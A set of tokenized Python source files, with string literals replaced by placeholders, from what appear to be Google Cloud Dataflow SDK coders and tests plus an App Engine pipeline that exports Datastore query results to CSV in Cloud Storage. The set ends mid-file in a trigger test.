<s> """<STR_LIT>""" <EOL> import contextlib <EOL> import cStringIO as StringIO <EOL> import csv <EOL> from google . appengine . ext import ndb <EOL> from src . clients import gcs <EOL> from src . pipelines import pipeline <EOL> class DatastoreInput ( pipeline . Pipeline ) : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def GetHelp ( ) : <EOL> return """<STR_LIT>""" <EOL> def run ( self , config ) : <EOL> """<STR_LIT>""" <EOL> storage = gcs . Gcs ( ) <EOL> gql = config . get ( '<STR_LIT>' ) <EOL> if not gql : <EOL> with contextlib . closing ( <EOL> storage . OpenObject ( url = config [ '<STR_LIT:object>' ] ) ) as stream : <EOL> with contextlib . closing ( StringIO . StringIO ( ) ) as gql_buf : <EOL> while True : <EOL> buf = stream . read ( gcs . Gcs . READ_CHUNK_SIZE ) <EOL> if buf and len ( buf ) : <EOL> gql_buf . write ( buf ) <EOL> else : <EOL> break <EOL> gql = gql_buf . getvalue ( ) <EOL> qkwargs = { } <EOL> consistency = None <EOL> keys_only = False <EOL> projection = None <EOL> if '<STR_LIT>' in config : <EOL> params = config [ '<STR_LIT>' ] <EOL> qkwargs = params . get ( '<STR_LIT>' , { } ) <EOL> consistency = params . get ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' in params and params [ '<STR_LIT>' ] is '<STR_LIT>' : <EOL> consistency = ndb . EVENTUAL_CONSISTENCY <EOL> keys_only = params . get ( '<STR_LIT>' , False ) <EOL> projection = params . get ( '<STR_LIT>' ) <EOL> writer = None <EOL> with contextlib . closing ( StringIO . StringIO ( ) ) as buf : <EOL> query = ndb . gql ( gql , ** qkwargs ) <EOL> for entity in query . iter ( read_policy = consistency , <EOL> keys_only = keys_only , <EOL> projection = projection ) : <EOL> if not projection : <EOL> projection = entity . _properties . keys ( ) <EOL> if not writer : <EOL> writer = csv . DictWriter ( buf , projection ) <EOL> headers = dict ( ( p , p ) for p in projection ) <EOL> writer . writerow ( headers ) <EOL> writer . writerow ( entity . to_dict ( ) ) <EOL> buf . seek ( <NUM_LIT:0> ) <EOL> storage . 
InsertObject ( buf , url = config [ '<STR_LIT>' ] [ <NUM_LIT:0> ] ) <EOL> def Lint ( self , linter ) : <EOL> """<STR_LIT>""" <EOL> linter . AtLeastOneFieldRequiredCheck ( [ '<STR_LIT>' , '<STR_LIT:object>' ] ) <EOL> linter . FieldCheck ( '<STR_LIT>' ) <EOL> linter . FieldCheck ( '<STR_LIT:object>' , validator = gcs . Gcs . UrlToBucketAndName ) <EOL> linter . FieldCheck ( '<STR_LIT>' , field_type = dict ) <EOL> linter . FieldCheck ( '<STR_LIT>' , field_type = dict ) <EOL> linter . FieldCheck ( '<STR_LIT>' , field_type = list , list_min = <NUM_LIT:1> ) <EOL> linter . FieldCheck ( '<STR_LIT>' , validator = self . ValidateConsistency ) <EOL> def ValidateConsistency ( self , consistency ) : <EOL> if consistency != '<STR_LIT>' and consistency != '<STR_LIT>' : <EOL> raise ValueError ( <EOL> '<STR_LIT>' % consistency ) </s>
<s> """<STR_LIT>""" <EOL> import collections <EOL> from cPickle import loads , dumps <EOL> try : <EOL> from google . cloud . dataflow . transforms . window import WindowedValue <EOL> except ImportError : <EOL> WindowedValue = collections . namedtuple ( <EOL> '<STR_LIT>' , ( '<STR_LIT:value>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> try : <EOL> from stream import InputStream as create_InputStream <EOL> from stream import OutputStream as create_OutputStream <EOL> except ImportError : <EOL> from slow_stream import InputStream as create_InputStream <EOL> from slow_stream import OutputStream as create_OutputStream <EOL> class CoderImpl ( object ) : <EOL> def encode_to_stream ( self , value , stream , nested ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def decode_from_stream ( self , stream , nested ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def encode ( self , value ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def decode ( self , encoded ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> class SimpleCoderImpl ( CoderImpl ) : <EOL> """<STR_LIT>""" <EOL> def encode_to_stream ( self , value , stream , nested ) : <EOL> """<STR_LIT>""" <EOL> stream . write ( self . encode ( value ) , nested ) <EOL> def decode_from_stream ( self , stream , nested ) : <EOL> """<STR_LIT>""" <EOL> return self . decode ( stream . read_all ( nested ) ) <EOL> class StreamCoderImpl ( CoderImpl ) : <EOL> """<STR_LIT>""" <EOL> def encode ( self , value ) : <EOL> out = create_OutputStream ( ) <EOL> self . encode_to_stream ( value , out , False ) <EOL> return out . get ( ) <EOL> def decode ( self , encoded ) : <EOL> return self . decode_from_stream ( create_InputStream ( encoded ) , False ) <EOL> class CallbackCoderImpl ( CoderImpl ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , encoder , decoder ) : <EOL> self . _encoder = encoder <EOL> self . 
_decoder = decoder <EOL> def encode_to_stream ( self , value , stream , nested ) : <EOL> return stream . write ( self . _encoder ( value ) , nested ) <EOL> def decode_from_stream ( self , stream , nested ) : <EOL> return self . _decoder ( stream . read_all ( nested ) ) <EOL> def encode ( self , value ) : <EOL> return self . _encoder ( value ) <EOL> def decode ( self , encoded ) : <EOL> return self . _decoder ( encoded ) <EOL> class DeterministicPickleCoderImpl ( CoderImpl ) : <EOL> def __init__ ( self , pickle_coder , step_label ) : <EOL> self . _pickle_coder = pickle_coder <EOL> self . _step_label = step_label <EOL> def _check_safe ( self , value ) : <EOL> if isinstance ( value , ( str , unicode , long , int , float ) ) : <EOL> pass <EOL> elif value is None : <EOL> pass <EOL> elif isinstance ( value , ( tuple , list ) ) : <EOL> for x in value : <EOL> self . _check_safe ( x ) <EOL> else : <EOL> raise TypeError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( <EOL> value , type ( value ) , self . _step_label ) ) <EOL> def encode_to_stream ( self , value , stream , nested ) : <EOL> self . _check_safe ( value ) <EOL> return self . _pickle_coder . encode_to_stream ( value , stream , nested ) <EOL> def decode_from_stream ( self , stream , nested ) : <EOL> return self . _pickle_coder . decode_from_stream ( stream , nested ) <EOL> def encode ( self , value ) : <EOL> self . _check_safe ( value ) <EOL> return self . _pickle_coder . encode ( value ) <EOL> def decode ( self , encoded ) : <EOL> return self . _pickle_coder . decode ( encoded ) <EOL> class BytesCoderImpl ( CoderImpl ) : <EOL> """<STR_LIT>""" <EOL> def encode_to_stream ( self , value , out , nested ) : <EOL> out . write ( value , nested ) <EOL> def decode_from_stream ( self , in_stream , nested ) : <EOL> return in_stream . 
read_all ( nested ) <EOL> def encode ( self , value ) : <EOL> assert isinstance ( value , bytes ) , ( value , type ( value ) ) <EOL> return value <EOL> def decode ( self , encoded ) : <EOL> return encoded <EOL> class FloatCoderImpl ( StreamCoderImpl ) : <EOL> def encode_to_stream ( self , value , out , nested ) : <EOL> out . write_bigendian_double ( value ) <EOL> def decode_from_stream ( self , in_stream , nested ) : <EOL> return in_stream . read_bigendian_double ( ) <EOL> class TimestampCoderImpl ( StreamCoderImpl ) : <EOL> def __init__ ( self , timestamp_class ) : <EOL> self . timestamp_class = timestamp_class <EOL> def encode_to_stream ( self , value , out , nested ) : <EOL> out . write_bigendian_int64 ( value . micros ) <EOL> def decode_from_stream ( self , in_stream , nested ) : <EOL> return self . timestamp_class ( micros = in_stream . read_bigendian_int64 ( ) ) <EOL> small_ints = [ chr ( _ ) for _ in range ( <NUM_LIT> ) ] <EOL> class VarIntCoderImpl ( StreamCoderImpl ) : <EOL> """<STR_LIT>""" <EOL> def encode_to_stream ( self , value , out , nested ) : <EOL> out . write_var_int64 ( value ) <EOL> def decode_from_stream ( self , in_stream , nested ) : <EOL> return in_stream . read_var_int64 ( ) <EOL> def encode ( self , value ) : <EOL> ivalue = value <EOL> if <NUM_LIT:0> <= ivalue < len ( small_ints ) : <EOL> return small_ints [ ivalue ] <EOL> else : <EOL> return StreamCoderImpl . encode ( self , value ) <EOL> def decode ( self , encoded ) : <EOL> if len ( encoded ) == <NUM_LIT:1> : <EOL> i = ord ( encoded ) <EOL> if <NUM_LIT:0> <= i < <NUM_LIT> : <EOL> return i <EOL> return StreamCoderImpl . decode ( self , encoded ) <EOL> class AbstractComponentCoderImpl ( StreamCoderImpl ) : <EOL> def __init__ ( self , coder_impls ) : <EOL> for c in coder_impls : <EOL> assert isinstance ( c , CoderImpl ) , c <EOL> self . 
_coder_impls = tuple ( coder_impls ) <EOL> def _extract_components ( self , value ) : <EOL> raise NotImplementedError <EOL> def _construct_from_components ( self , components ) : <EOL> raise NotImplementedError <EOL> def encode_to_stream ( self , value , out , nested ) : <EOL> values = self . _extract_components ( value ) <EOL> if len ( self . _coder_impls ) != len ( values ) : <EOL> raise ValueError ( <EOL> '<STR_LIT>' ) <EOL> for i in range ( <NUM_LIT:0> , len ( self . _coder_impls ) ) : <EOL> c = self . _coder_impls [ i ] <EOL> c . encode_to_stream ( values [ i ] , out , True ) <EOL> def decode_from_stream ( self , in_stream , nested ) : <EOL> return self . _construct_from_components ( <EOL> [ c . decode_from_stream ( in_stream , True ) for c in self . _coder_impls ] ) <EOL> class TupleCoderImpl ( AbstractComponentCoderImpl ) : <EOL> """<STR_LIT>""" <EOL> def _extract_components ( self , value ) : <EOL> return value <EOL> def _construct_from_components ( self , components ) : <EOL> return tuple ( components ) <EOL> class WindowedValueCoderImpl ( AbstractComponentCoderImpl ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , wrapped_value_coder , timestamp_coder , window_coder ) : <EOL> super ( WindowedValueCoderImpl , self ) . __init__ ( <EOL> ( wrapped_value_coder , timestamp_coder , window_coder ) ) <EOL> self . wrapped_value_coder = wrapped_value_coder <EOL> self . timestamp_coder = timestamp_coder <EOL> self . window_coder = window_coder <EOL> def _extract_components ( self , value ) : <EOL> return [ value . value , value . timestamp , value . windows ] <EOL> def _construct_from_components ( self , components ) : <EOL> return WindowedValue ( components [ <NUM_LIT:0> ] , <EOL> components [ <NUM_LIT:1> ] , <EOL> components [ <NUM_LIT:2> ] ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import unittest <EOL> import google . cloud . dataflow as df <EOL> from google . cloud . dataflow . examples . cookbook import bigquery_side_input <EOL> class BigQuerySideInputTest ( unittest . TestCase ) : <EOL> def test_create_groups ( self ) : <EOL> p = df . Pipeline ( '<STR_LIT>' ) <EOL> group_ids_pcoll = p | df . Create ( '<STR_LIT>' , [ '<STR_LIT:A>' , '<STR_LIT:B>' , '<STR_LIT:C>' ] ) <EOL> corpus_pcoll = p | df . Create ( '<STR_LIT>' , <EOL> [ { '<STR_LIT:f>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:f>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:f>' : '<STR_LIT>' } ] ) <EOL> words_pcoll = p | df . Create ( '<STR_LIT>' , [ { '<STR_LIT:f>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:f>' : '<STR_LIT>' } , <EOL> { '<STR_LIT:f>' : '<STR_LIT>' } ] ) <EOL> ignore_corpus_pcoll = p | df . Create ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> ignore_word_pcoll = p | df . Create ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> groups = bigquery_side_input . create_groups ( group_ids_pcoll , corpus_pcoll , <EOL> words_pcoll , ignore_corpus_pcoll , <EOL> ignore_word_pcoll ) <EOL> def group_matcher ( actual ) : <EOL> self . assertEqual ( len ( actual ) , <NUM_LIT:3> ) <EOL> for group in actual : <EOL> self . assertEqual ( len ( group ) , <NUM_LIT:3> ) <EOL> self . assertTrue ( group [ <NUM_LIT:1> ] . startswith ( '<STR_LIT>' ) ) <EOL> self . assertNotEqual ( group [ <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> self . assertTrue ( group [ <NUM_LIT:2> ] . startswith ( '<STR_LIT>' ) ) <EOL> self . assertNotEqual ( group [ <NUM_LIT:2> ] , '<STR_LIT>' ) <EOL> df . assert_that ( groups , group_matcher ) <EOL> p . run ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> logging . getLogger ( ) . setLevel ( logging . INFO ) <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import collections <EOL> import logging <EOL> import re <EOL> import tempfile <EOL> import unittest <EOL> from google . cloud . dataflow . examples import wordcount <EOL> class WordCountTest ( unittest . TestCase ) : <EOL> SAMPLE_TEXT = '<STR_LIT>' <EOL> def create_temp_file ( self , contents ) : <EOL> with tempfile . NamedTemporaryFile ( delete = False ) as f : <EOL> f . write ( contents ) <EOL> return f . name <EOL> def test_basics ( self ) : <EOL> temp_path = self . create_temp_file ( self . SAMPLE_TEXT ) <EOL> expected_words = collections . defaultdict ( int ) <EOL> for word in re . findall ( r'<STR_LIT>' , self . SAMPLE_TEXT ) : <EOL> expected_words [ word ] += <NUM_LIT:1> <EOL> wordcount . run ( [ <EOL> '<STR_LIT>' % temp_path , <EOL> '<STR_LIT>' % temp_path ] ) <EOL> results = [ ] <EOL> with open ( temp_path + '<STR_LIT>' ) as result_file : <EOL> for line in result_file : <EOL> match = re . search ( r'<STR_LIT>' , line ) <EOL> if match is not None : <EOL> results . append ( ( match . group ( <NUM_LIT:1> ) , int ( match . group ( <NUM_LIT:2> ) ) ) ) <EOL> self . assertEqual ( sorted ( results ) , sorted ( expected_words . iteritems ( ) ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> logging . getLogger ( ) . setLevel ( logging . INFO ) <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import multiprocessing <EOL> import os <EOL> import random <EOL> import threading <EOL> import unittest <EOL> from google . cloud . dataflow . io import gcsio <EOL> from google . cloud . dataflow . internal . clients import storage <EOL> class FakeGcsClient ( object ) : <EOL> def __init__ ( self ) : <EOL> self . objects = FakeGcsObjects ( ) <EOL> class FakeFile ( object ) : <EOL> def __init__ ( self , bucket , obj , contents , generation ) : <EOL> self . bucket = bucket <EOL> self . object = obj <EOL> self . contents = contents <EOL> self . generation = generation <EOL> def get_metadata ( self ) : <EOL> return storage . Object ( bucket = self . bucket , <EOL> name = self . object , <EOL> generation = self . generation , <EOL> size = len ( self . contents ) ) <EOL> class FakeGcsObjects ( object ) : <EOL> def __init__ ( self ) : <EOL> self . files = { } <EOL> self . list_page_tokens = { } <EOL> def add_file ( self , f ) : <EOL> self . files [ ( f . bucket , f . object ) ] = f <EOL> def get_file ( self , bucket , obj ) : <EOL> return self . files . get ( ( bucket , obj ) , None ) <EOL> def Get ( self , get_request , download = None ) : <EOL> f = self . get_file ( get_request . bucket , get_request . object ) <EOL> if f is None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if download is None : <EOL> return f . get_metadata ( ) <EOL> else : <EOL> stream = download . stream <EOL> def get_range_callback ( start , end ) : <EOL> assert start >= <NUM_LIT:0> and end >= start and end < len ( f . contents ) <EOL> stream . write ( f . contents [ start : end + <NUM_LIT:1> ] ) <EOL> download . GetRange = get_range_callback <EOL> def Insert ( self , insert_request , upload = None ) : <EOL> assert upload is not None <EOL> generation = <NUM_LIT:1> <EOL> f = self . get_file ( insert_request . bucket , insert_request . name ) <EOL> if f is not None : <EOL> generation = f . generation + <NUM_LIT:1> <EOL> f = FakeFile ( insert_request . 
bucket , insert_request . name , '<STR_LIT>' , generation ) <EOL> stream = upload . stream <EOL> data_list = [ ] <EOL> while True : <EOL> data = stream . read ( <NUM_LIT> * <NUM_LIT> ) <EOL> if not data : <EOL> break <EOL> data_list . append ( data ) <EOL> f . contents = '<STR_LIT>' . join ( data_list ) <EOL> self . add_file ( f ) <EOL> def List ( self , list_request ) : <EOL> bucket = list_request . bucket <EOL> prefix = list_request . prefix or '<STR_LIT>' <EOL> matching_files = [ ] <EOL> for file_bucket , file_name in sorted ( iter ( self . files ) ) : <EOL> if bucket == file_bucket and file_name . startswith ( prefix ) : <EOL> file_object = self . files [ ( file_bucket , file_name ) ] . get_metadata ( ) <EOL> matching_files . append ( file_object ) <EOL> items_per_page = <NUM_LIT:5> <EOL> if not list_request . pageToken : <EOL> range_start = <NUM_LIT:0> <EOL> else : <EOL> if list_request . pageToken not in self . list_page_tokens : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> range_start = self . list_page_tokens [ list_request . pageToken ] <EOL> del self . list_page_tokens [ list_request . pageToken ] <EOL> result = storage . Objects ( <EOL> items = matching_files [ range_start : range_start + items_per_page ] ) <EOL> if range_start + items_per_page < len ( matching_files ) : <EOL> next_range_start = range_start + items_per_page <EOL> next_page_token = '<STR_LIT>' % ( bucket , prefix , <EOL> next_range_start ) <EOL> self . list_page_tokens [ next_page_token ] = next_range_start <EOL> result . nextPageToken = next_page_token <EOL> return result <EOL> class TestGCSPathParser ( unittest . TestCase ) : <EOL> def test_gcs_path ( self ) : <EOL> self . assertEqual ( <EOL> gcsio . parse_gcs_path ( '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT:name>' ) ) <EOL> self . assertEqual ( <EOL> gcsio . parse_gcs_path ( '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def test_bad_gcs_path ( self ) : <EOL> self . assertRaises ( ValueError , gcsio . 
parse_gcs_path , '<STR_LIT>' ) <EOL> self . assertRaises ( ValueError , gcsio . parse_gcs_path , '<STR_LIT>' ) <EOL> self . assertRaises ( ValueError , gcsio . parse_gcs_path , '<STR_LIT>' ) <EOL> self . assertRaises ( ValueError , gcsio . parse_gcs_path , '<STR_LIT>' ) <EOL> self . assertRaises ( ValueError , gcsio . parse_gcs_path , '<STR_LIT>' ) <EOL> self . assertRaises ( ValueError , gcsio . parse_gcs_path , '<STR_LIT>' ) <EOL> class TestGCSIO ( unittest . TestCase ) : <EOL> def _insert_random_file ( self , client , path , size , generation = <NUM_LIT:1> ) : <EOL> bucket , name = gcsio . parse_gcs_path ( path ) <EOL> f = FakeFile ( bucket , name , os . urandom ( size ) , generation ) <EOL> client . objects . add_file ( f ) <EOL> return f <EOL> def setUp ( self ) : <EOL> self . client = FakeGcsClient ( ) <EOL> self . gcs = gcsio . GcsIO ( self . client ) <EOL> def test_full_file_read ( self ) : <EOL> file_name = '<STR_LIT>' <EOL> file_size = <NUM_LIT:5> * <NUM_LIT> * <NUM_LIT> + <NUM_LIT:100> <EOL> random_file = self . _insert_random_file ( self . client , file_name , file_size ) <EOL> f = self . gcs . open ( file_name ) <EOL> f . seek ( <NUM_LIT:0> , os . SEEK_END ) <EOL> self . assertEqual ( f . tell ( ) , file_size ) <EOL> self . assertEqual ( f . read ( ) , '<STR_LIT>' ) <EOL> f . seek ( <NUM_LIT:0> ) <EOL> self . assertEqual ( f . read ( ) , random_file . contents ) <EOL> def test_file_random_seek ( self ) : <EOL> file_name = '<STR_LIT>' <EOL> file_size = <NUM_LIT:5> * <NUM_LIT> * <NUM_LIT> - <NUM_LIT:100> <EOL> random_file = self . _insert_random_file ( self . client , file_name , file_size ) <EOL> f = self . gcs . open ( file_name ) <EOL> random . seed ( <NUM_LIT:0> ) <EOL> for _ in range ( <NUM_LIT:0> , <NUM_LIT:10> ) : <EOL> a = random . randint ( <NUM_LIT:0> , file_size - <NUM_LIT:1> ) <EOL> b = random . randint ( <NUM_LIT:0> , file_size - <NUM_LIT:1> ) <EOL> start , end = min ( a , b ) , max ( a , b ) <EOL> f . seek ( start ) <EOL> self . 
assertEqual ( f . tell ( ) , start ) <EOL> self . assertEqual ( f . read ( end - start + <NUM_LIT:1> ) , <EOL> random_file . contents [ start : end + <NUM_LIT:1> ] ) <EOL> self . assertEqual ( f . tell ( ) , end + <NUM_LIT:1> ) <EOL> def test_file_read_line ( self ) : <EOL> file_name = '<STR_LIT>' <EOL> lines = [ ] <EOL> read_buffer_size = <NUM_LIT> <EOL> lines . append ( '<STR_LIT:x>' * <NUM_LIT> + '<STR_LIT:\n>' ) <EOL> for _ in range ( <NUM_LIT:1> , <NUM_LIT:1000> ) : <EOL> line_length = random . randint ( <NUM_LIT:100> , <NUM_LIT> ) <EOL> line = os . urandom ( line_length ) . replace ( '<STR_LIT:\n>' , '<STR_LIT:U+0020>' ) + '<STR_LIT:\n>' <EOL> lines . append ( line ) <EOL> contents = '<STR_LIT>' . join ( lines ) <EOL> file_size = len ( contents ) <EOL> bucket , name = gcsio . parse_gcs_path ( file_name ) <EOL> self . client . objects . add_file ( FakeFile ( bucket , name , contents , <NUM_LIT:1> ) ) <EOL> f = self . gcs . open ( file_name , read_buffer_size = read_buffer_size ) <EOL> f . seek ( <NUM_LIT:0> ) <EOL> self . assertEqual ( f . readline ( ) , lines [ <NUM_LIT:0> ] ) <EOL> self . assertEqual ( f . tell ( ) , len ( lines [ <NUM_LIT:0> ] ) ) <EOL> self . assertEqual ( f . readline ( ) , lines [ <NUM_LIT:1> ] ) <EOL> f . seek ( file_size - len ( lines [ - <NUM_LIT:1> ] ) - <NUM_LIT:1> ) <EOL> self . assertEqual ( f . readline ( ) , '<STR_LIT:\n>' ) <EOL> f . seek ( file_size ) <EOL> self . assertEqual ( f . readline ( ) , '<STR_LIT>' ) <EOL> random . seed ( <NUM_LIT:0> ) <EOL> for _ in range ( <NUM_LIT:0> , <NUM_LIT:10> ) : <EOL> start = random . randint ( <NUM_LIT:0> , file_size - <NUM_LIT:1> ) <EOL> line_index = <NUM_LIT:0> <EOL> chars_left = start <EOL> while True : <EOL> next_line_length = len ( lines [ line_index ] ) <EOL> if chars_left - next_line_length < <NUM_LIT:0> : <EOL> break <EOL> chars_left -= next_line_length <EOL> line_index += <NUM_LIT:1> <EOL> f . seek ( start ) <EOL> self . assertEqual ( f . 
readline ( ) , lines [ line_index ] [ chars_left : ] ) <EOL> def test_file_write ( self ) : <EOL> file_name = '<STR_LIT>' <EOL> file_size = <NUM_LIT:5> * <NUM_LIT> * <NUM_LIT> + <NUM_LIT> <EOL> contents = os . urandom ( file_size ) <EOL> f = self . gcs . open ( file_name , '<STR_LIT:w>' ) <EOL> f . write ( contents [ <NUM_LIT:0> : <NUM_LIT:1000> ] ) <EOL> f . write ( contents [ <NUM_LIT:1000> : <NUM_LIT> * <NUM_LIT> ] ) <EOL> f . write ( contents [ <NUM_LIT> * <NUM_LIT> : ] ) <EOL> f . close ( ) <EOL> bucket , name = gcsio . parse_gcs_path ( file_name ) <EOL> self . assertEqual ( <EOL> self . client . objects . get_file ( bucket , name ) . contents , contents ) <EOL> def test_context_manager ( self ) : <EOL> file_name = '<STR_LIT>' <EOL> file_size = <NUM_LIT> <EOL> contents = os . urandom ( file_size ) <EOL> with self . gcs . open ( file_name , '<STR_LIT:w>' ) as f : <EOL> f . write ( contents ) <EOL> bucket , name = gcsio . parse_gcs_path ( file_name ) <EOL> self . assertEqual ( <EOL> self . client . objects . get_file ( bucket , name ) . contents , contents ) <EOL> with self . gcs . open ( file_name ) as f : <EOL> self . assertEqual ( f . read ( ) , contents ) <EOL> with self . assertRaises ( ZeroDivisionError ) : <EOL> with self . gcs . open ( file_name ) as f : <EOL> f . read ( <NUM_LIT:0> / <NUM_LIT:0> ) <EOL> def test_glob ( self ) : <EOL> bucket_name = '<STR_LIT>' <EOL> object_names = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> for object_name in object_names : <EOL> file_name = '<STR_LIT>' % ( bucket_name , object_name ) <EOL> self . _insert_random_file ( self . 
client , file_name , <NUM_LIT:0> ) <EOL> test_cases = [ <EOL> ( '<STR_LIT>' , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) , <EOL> ( '<STR_LIT>' , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) , <EOL> ( '<STR_LIT>' , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) , <EOL> ( '<STR_LIT>' , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) , <EOL> ( '<STR_LIT>' , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) , <EOL> ( '<STR_LIT>' , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) , <EOL> ( '<STR_LIT>' , [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) , <EOL> ] <EOL> for file_pattern , expected_object_names in test_cases : <EOL> expected_file_names = [ '<STR_LIT>' % ( bucket_name , o ) for o in <EOL> expected_object_names ] <EOL> self . assertEqual ( set ( self . gcs . glob ( file_pattern ) ) , <EOL> set ( expected_file_names ) ) <EOL> class TestPipeStream ( unittest . TestCase ) : <EOL> def _read_and_verify ( self , stream , expected , buffer_size ) : <EOL> data_list = [ ] <EOL> bytes_read = <NUM_LIT:0> <EOL> seen_last_block = False <EOL> while True : <EOL> data = stream . read ( buffer_size ) <EOL> self . assertLessEqual ( len ( data ) , buffer_size ) <EOL> if len ( data ) < buffer_size : <EOL> if data : <EOL> self . assertFalse ( seen_last_block ) <EOL> seen_last_block = True <EOL> if not data : <EOL> break <EOL> data_list . append ( data ) <EOL> bytes_read += len ( data ) <EOL> self . assertEqual ( stream . tell ( ) , bytes_read ) <EOL> self . assertEqual ( '<STR_LIT>' . 
join ( data_list ) , expected ) <EOL> def test_pipe_stream ( self ) : <EOL> block_sizes = list ( <NUM_LIT:4> ** i for i in range ( <NUM_LIT:0> , <NUM_LIT:12> ) ) <EOL> data_blocks = list ( os . urandom ( size ) for size in block_sizes ) <EOL> expected = '<STR_LIT>' . join ( data_blocks ) <EOL> buffer_sizes = [ <NUM_LIT> , <NUM_LIT> * <NUM_LIT> , <NUM_LIT> * <NUM_LIT> ] <EOL> for buffer_size in buffer_sizes : <EOL> parent_conn , child_conn = multiprocessing . Pipe ( ) <EOL> stream = gcsio . GcsBufferedWriter . PipeStream ( child_conn ) <EOL> child_thread = threading . Thread ( target = self . _read_and_verify , <EOL> args = ( stream , expected , buffer_size ) ) <EOL> child_thread . start ( ) <EOL> for data in data_blocks : <EOL> parent_conn . send_bytes ( data ) <EOL> parent_conn . close ( ) <EOL> child_thread . join ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> logging . getLogger ( ) . setLevel ( logging . INFO ) <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import collections <EOL> import os . path <EOL> import unittest <EOL> import yaml <EOL> import google . cloud . dataflow as df <EOL> from google . cloud . dataflow . pipeline import Pipeline <EOL> from google . cloud . dataflow . transforms . core import Windowing <EOL> from google . cloud . dataflow . transforms . trigger import AccumulationMode <EOL> from google . cloud . dataflow . transforms . trigger import AfterAll <EOL> from google . cloud . dataflow . transforms . trigger import AfterCount <EOL> from google . cloud . dataflow . transforms . trigger import AfterEach <EOL> from google . cloud . dataflow . transforms . trigger import AfterFirst <EOL> from google . cloud . dataflow . transforms . trigger import AfterWatermark <EOL> from google . cloud . dataflow . transforms . trigger import DefaultTrigger <EOL> from google . cloud . dataflow . transforms . trigger import GeneralTriggerDriver <EOL> from google . cloud . dataflow . transforms . trigger import InMemoryUnmergedState <EOL> from google . cloud . dataflow . transforms . trigger import Repeatedly <EOL> from google . cloud . dataflow . transforms . util import assert_that , equal_to <EOL> from google . cloud . dataflow . transforms . window import FixedWindows <EOL> from google . cloud . dataflow . transforms . window import IntervalWindow <EOL> from google . cloud . dataflow . transforms . window import MIN_TIMESTAMP <EOL> from google . cloud . dataflow . transforms . window import OutputTimeFn <EOL> from google . cloud . dataflow . transforms . window import Sessions <EOL> from google . cloud . dataflow . transforms . window import TimestampedValue <EOL> from google . cloud . dataflow . transforms . window import WindowedValue <EOL> from google . cloud . dataflow . transforms . 
window import WindowFn <EOL> class CustomTimestampingFixedWindowsWindowFn ( FixedWindows ) : <EOL> """<STR_LIT>""" <EOL> def get_transformed_output_time ( self , unused_window , input_timestamp ) : <EOL> return input_timestamp + <NUM_LIT:100> <EOL> class TriggerTest ( unittest . TestCase ) : <EOL> def run_trigger_simple ( self , window_fn , trigger_fn , accumulation_mode , <EOL> timestamped_data , expected_panes , * groupings , <EOL> ** kwargs ) : <EOL> late_data = kwargs . pop ( '<STR_LIT>' , [ ] ) <EOL> assert not kwargs <EOL> def bundle_data ( data , size ) : <EOL> bundle = [ ] <EOL> for timestamp , elem in data : <EOL> windows = window_fn . assign ( WindowFn . AssignContext ( timestamp , elem ) ) <EOL> bundle . append ( WindowedValue ( elem , timestamp , windows ) ) <EOL> if len ( bundle ) == size : <EOL> yield bundle <EOL> bundle = [ ] <EOL> if bundle : <EOL> yield bundle <EOL> if not groupings : <EOL> groupings = [ <NUM_LIT:1> ] <EOL> for group_by in groupings : <EOL> bundles = [ ] <EOL> bundle = [ ] <EOL> for timestamp , elem in timestamped_data : <EOL> windows = window_fn . assign ( WindowFn . AssignContext ( 